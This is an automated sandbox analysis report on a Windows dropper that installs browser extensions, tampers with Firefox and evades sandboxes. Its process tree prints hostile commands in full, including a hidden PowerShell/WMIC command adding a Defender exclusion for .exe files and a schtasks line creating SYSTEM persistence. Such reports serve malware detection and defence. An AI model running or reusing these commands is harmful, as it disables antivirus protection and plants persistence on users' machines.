Analysis
-
max time kernel
125s -
max time network
131s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
03-07-2024 06:01
Static task
static1
Behavioral task
behavioral1
Sample
24d958acf8e2ab0261d207c241dc6a927d7f1d2c460d4ff5bdad4d14c37c8ac0.exe
Resource
win10v2004-20240611-en
General
-
Target
24d958acf8e2ab0261d207c241dc6a927d7f1d2c460d4ff5bdad4d14c37c8ac0.exe
-
Size
7.3MB
-
MD5
00f35b3a1dd8c03b0a23c3a3b5535073
-
SHA1
ee79fa79d9a2241c0dbb5d22fdf7897c76a2e057
-
SHA256
24d958acf8e2ab0261d207c241dc6a927d7f1d2c460d4ff5bdad4d14c37c8ac0
-
SHA512
4593c75a3ce8dbe745def352e78580d465b8d48a8fb3c1234ca198b235b6bd22a6526faebb680b942e0c42c92343150a37f328bbf15b9c444723f84e4ae9b109
-
SSDEEP
196608:91OgLCXoq3bkclTgC2lCBqWMQLa1Mm1gWD3n7Sx:3Oge3bk60lCytJDq
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1080 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4060 powershell.exe 2952 powershell.EXE 3116 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Control Panel\International\Geo\Nation IDnhbKQ.exe -
Executes dropped EXE 4 IoCs
pid Process 3552 Install.exe 3908 Install.exe 4752 Install.exe 388 IDnhbKQ.exe -
Loads dropped DLL 1 IoCs
pid Process 1080 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json IDnhbKQ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json IDnhbKQ.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini IDnhbKQ.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 IDnhbKQ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 IDnhbKQ.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData IDnhbKQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 IDnhbKQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 IDnhbKQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 IDnhbKQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 IDnhbKQ.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\wEnnazEvJNiU2\EJWRdkl.xml IDnhbKQ.exe File created C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\seaSFKg.xml IDnhbKQ.exe File created C:\Program Files (x86)\bgwuTdWixDdNC\VuXJZMh.dll IDnhbKQ.exe File created C:\Program Files (x86)\namDtuGKU\MGaBVq.dll IDnhbKQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi IDnhbKQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IDnhbKQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja IDnhbKQ.exe File created C:\Program Files (x86)\namDtuGKU\IuNZrmv.xml IDnhbKQ.exe File created C:\Program Files (x86)\kwkuzFKVqEUn\soTlsbe.dll IDnhbKQ.exe File created C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\vQdXhWW.dll IDnhbKQ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi IDnhbKQ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IDnhbKQ.exe File created C:\Program Files (x86)\bgwuTdWixDdNC\yhspSoI.xml IDnhbKQ.exe File created C:\Program Files (x86)\wEnnazEvJNiU2\YMXGTaHBPVVqn.dll IDnhbKQ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bsqNJSiTyoMLfdbIdy.job schtasks.exe File created C:\Windows\Tasks\KdMGsZYUagVlNoZLt.job schtasks.exe File created C:\Windows\Tasks\jRbEfcGJuWiRduS.job schtasks.exe File created C:\Windows\Tasks\kPVQaxkVtdiJeIOQR.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1076 4752 WerFault.exe 87 676 3908 WerFault.exe 77 2836 388 WerFault.exe 159 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" IDnhbKQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" IDnhbKQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IDnhbKQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" IDnhbKQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" Install.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix IDnhbKQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{e9075ed3-0000-0000-0000-d01200000000} IDnhbKQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" IDnhbKQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" IDnhbKQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1432 schtasks.exe 1812 schtasks.exe 2692 schtasks.exe 4620 schtasks.exe 2708 schtasks.exe 3256 schtasks.exe 1400 schtasks.exe 3456 schtasks.exe 2288 schtasks.exe 2748 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4060 powershell.exe 4060 powershell.exe 4172 powershell.exe 4172 powershell.exe 4688 powershell.exe 4688 powershell.exe 2952 powershell.EXE 2952 powershell.EXE 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 3116 powershell.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 3116 powershell.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe 388 IDnhbKQ.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4060 powershell.exe Token: SeIncreaseQuotaPrivilege 2056 WMIC.exe Token: SeSecurityPrivilege 2056 WMIC.exe Token: SeTakeOwnershipPrivilege 2056 WMIC.exe Token: SeLoadDriverPrivilege 2056 WMIC.exe Token: SeSystemProfilePrivilege 2056 WMIC.exe Token: SeSystemtimePrivilege 2056 WMIC.exe Token: SeProfSingleProcessPrivilege 2056 WMIC.exe Token: SeIncBasePriorityPrivilege 2056 WMIC.exe Token: SeCreatePagefilePrivilege 2056 WMIC.exe Token: SeBackupPrivilege 2056 WMIC.exe Token: SeRestorePrivilege 2056 WMIC.exe Token: SeShutdownPrivilege 2056 WMIC.exe Token: SeDebugPrivilege 2056 WMIC.exe Token: SeSystemEnvironmentPrivilege 2056 WMIC.exe Token: SeRemoteShutdownPrivilege 2056 WMIC.exe Token: SeUndockPrivilege 2056 WMIC.exe Token: SeManageVolumePrivilege 2056 WMIC.exe Token: 33 2056 WMIC.exe Token: 34 2056 WMIC.exe Token: 35 2056 WMIC.exe Token: 36 2056 WMIC.exe Token: SeIncreaseQuotaPrivilege 2056 WMIC.exe Token: SeSecurityPrivilege 2056 WMIC.exe Token: SeTakeOwnershipPrivilege 2056 WMIC.exe Token: SeLoadDriverPrivilege 2056 WMIC.exe Token: SeSystemProfilePrivilege 2056 WMIC.exe Token: SeSystemtimePrivilege 2056 WMIC.exe Token: SeProfSingleProcessPrivilege 2056 WMIC.exe Token: SeIncBasePriorityPrivilege 2056 WMIC.exe Token: SeCreatePagefilePrivilege 2056 WMIC.exe Token: SeBackupPrivilege 2056 WMIC.exe Token: SeRestorePrivilege 2056 WMIC.exe Token: SeShutdownPrivilege 2056 WMIC.exe Token: SeDebugPrivilege 2056 WMIC.exe Token: SeSystemEnvironmentPrivilege 2056 WMIC.exe Token: SeRemoteShutdownPrivilege 2056 WMIC.exe Token: SeUndockPrivilege 2056 WMIC.exe Token: SeManageVolumePrivilege 2056 WMIC.exe Token: 33 2056 WMIC.exe Token: 34 2056 WMIC.exe Token: 35 2056 WMIC.exe Token: 36 2056 WMIC.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeDebugPrivilege 2952 powershell.EXE Token: SeDebugPrivilege 3116 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1552 WMIC.exe Token: SeIncreaseQuotaPrivilege 1552 WMIC.exe Token: SeSecurityPrivilege 1552 WMIC.exe Token: SeTakeOwnershipPrivilege 1552 WMIC.exe Token: SeLoadDriverPrivilege 1552 WMIC.exe Token: SeSystemtimePrivilege 1552 WMIC.exe Token: SeBackupPrivilege 1552 WMIC.exe Token: SeRestorePrivilege 1552 WMIC.exe Token: SeShutdownPrivilege 1552 WMIC.exe Token: SeSystemEnvironmentPrivilege 1552 WMIC.exe Token: SeUndockPrivilege 1552 WMIC.exe Token: SeManageVolumePrivilege 1552 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1552 WMIC.exe Token: SeIncreaseQuotaPrivilege 1552 WMIC.exe Token: SeSecurityPrivilege 1552 WMIC.exe Token: SeTakeOwnershipPrivilege 1552 WMIC.exe Token: SeLoadDriverPrivilege 1552 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3396 wrote to memory of 3552 3396 24d958acf8e2ab0261d207c241dc6a927d7f1d2c460d4ff5bdad4d14c37c8ac0.exe 76 PID 3396 wrote to memory of 3552 3396 24d958acf8e2ab0261d207c241dc6a927d7f1d2c460d4ff5bdad4d14c37c8ac0.exe 76 PID 3396 wrote to memory of 3552 3396 24d958acf8e2ab0261d207c241dc6a927d7f1d2c460d4ff5bdad4d14c37c8ac0.exe 76 PID 3552 wrote to memory of 3908 3552 Install.exe 77 PID 3552 wrote to memory of 3908 3552 Install.exe 77 PID 3552 wrote to memory of 3908 3552 Install.exe 77 PID 3908 wrote to memory of 1260 3908 Install.exe 79 PID 3908 wrote to memory of 1260 3908 Install.exe 79 PID 3908 wrote to memory of 1260 3908 Install.exe 79 PID 1260 wrote to memory of 1312 1260 forfiles.exe 81 PID 1260 wrote to memory of 1312 1260 forfiles.exe 81 PID 1260 wrote to memory of 1312 1260 forfiles.exe 81 PID 1312 wrote to memory of 4060 1312 cmd.exe 82 PID 1312 wrote to memory of 4060 1312 cmd.exe 82 PID 1312 wrote to memory of 4060 1312 cmd.exe 82 PID 4060 wrote to memory of 2056 4060 powershell.exe 83 PID 4060 wrote to memory of 2056 4060 powershell.exe 83 PID 4060 wrote to memory of 2056 4060 powershell.exe 83 PID 3908 wrote to memory of 2288 3908 Install.exe 85 PID 3908 wrote to memory of 2288 3908 Install.exe 85 PID 3908 wrote to memory of 2288 3908 Install.exe 85 PID 4752 wrote to memory of 4172 4752 Install.exe 88 PID 4752 wrote to memory of 4172 4752 Install.exe 88 PID 4752 wrote to memory of 4172 4752 Install.exe 88 PID 4172 wrote to memory of 4496 4172 powershell.exe 90 PID 4172 wrote to memory of 4496 4172 powershell.exe 90 PID 4172 wrote to memory of 4496 4172 powershell.exe 90 PID 4496 wrote to memory of 3092 4496 cmd.exe 91 PID 4496 wrote to memory of 3092 4496 cmd.exe 91 PID 4496 wrote to memory of 3092 4496 cmd.exe 91 PID 4172 wrote to memory of 1536 4172 powershell.exe 92 PID 4172 wrote to memory of 1536 4172 powershell.exe 92 PID 4172 wrote to memory of 1536 4172 powershell.exe 92 PID 4172 wrote to memory of 2312 4172 powershell.exe 93 PID 4172 wrote to memory of 2312 4172 powershell.exe 93 PID 4172 wrote to memory of 2312 4172 powershell.exe 93 PID 4172 wrote to memory of 4032 4172 powershell.exe 94 PID 4172 wrote to memory of 4032 4172 powershell.exe 94 PID 4172 wrote to memory of 4032 4172 powershell.exe 94 PID 4172 wrote to memory of 716 4172 powershell.exe 95 PID 4172 wrote to memory of 716 4172 powershell.exe 95 PID 4172 wrote to memory of 716 4172 powershell.exe 95 PID 4172 wrote to memory of 1076 4172 powershell.exe 96 PID 4172 wrote to memory of 1076 4172 powershell.exe 96 PID 4172 wrote to memory of 1076 4172 powershell.exe 96 PID 4172 wrote to memory of 4480 4172 powershell.exe 97 PID 4172 wrote to memory of 4480 4172 powershell.exe 97 PID 4172 wrote to memory of 4480 4172 powershell.exe 97 PID 4172 wrote to memory of 4904 4172 powershell.exe 98 PID 4172 wrote to memory of 4904 4172 powershell.exe 98 PID 4172 wrote to memory of 4904 4172 powershell.exe 98 PID 4172 wrote to memory of 2152 4172 powershell.exe 99 PID 4172 wrote to memory of 2152 4172 powershell.exe 99 PID 4172 wrote to memory of 2152 4172 powershell.exe 99 PID 4172 wrote to memory of 3332 4172 powershell.exe 100 PID 4172 wrote to memory of 3332 4172 powershell.exe 100 PID 4172 wrote to memory of 3332 4172 powershell.exe 100 PID 4172 wrote to memory of 1372 4172 powershell.exe 101 PID 4172 wrote to memory of 1372 4172 powershell.exe 101 PID 4172 wrote to memory of 1372 4172 powershell.exe 101 PID 4172 wrote to memory of 4808 4172 powershell.exe 102 PID 4172 wrote to memory of 4808 4172 powershell.exe 102 PID 4172 wrote to memory of 4808 4172 powershell.exe 102 PID 4172 wrote to memory of 892 4172 powershell.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\24d958acf8e2ab0261d207c241dc6a927d7f1d2c460d4ff5bdad4d14c37c8ac0.exe"C:\Users\Admin\AppData\Local\Temp\24d958acf8e2ab0261d207c241dc6a927d7f1d2c460d4ff5bdad4d14c37c8ac0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Users\Admin\AppData\Local\Temp\7zS372D.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\7zS3921.tmp\Install.exe.\Install.exe /Cudida "385137" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bsqNJSiTyoMLfdbIdy" /SC once /ST 06:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS3921.tmp\Install.exe\" 2Z /TFDdiddSw 385137 /S" /V1 /F4⤵
